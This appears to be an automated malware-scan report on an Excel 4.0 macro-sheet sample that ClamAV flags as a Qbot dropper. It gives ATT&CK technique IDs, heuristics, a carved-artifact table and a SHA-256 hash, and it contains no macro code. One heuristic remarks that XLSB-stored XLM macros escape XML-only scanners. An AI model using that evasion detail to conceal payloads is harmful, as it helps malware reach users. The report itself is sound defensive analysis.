MALICIOUS
Risk Score: 120
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file is identified as an Excel 4.0 macro sheet, a known precursor for malware delivery. The ClamAV signature 'Xls.Dropper.QbotDocu12020-9818439-0' strongly suggests it's a Qbot dropper. Excel 4.0 macros are typically used to execute commands, often to download and run additional malicious payloads.
Heuristics 2
- ClamAV: Xls.Dropper.QbotDocu12020-9818439-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Dropper.QbotDocu12020-9818439-0
- Excel 4.0 macro sheet (1 sheet(s)) (critical, OOXML_XLM_MACROSHEET): Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_sheet_00.bin | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.bin | 3326 bytes |

SHA-256: efdf16876203f44fe7b98ede18e9b2e23550da42636a1900c23d16b3665bb1a4
Preview script: first 1,000 lines of the extracted script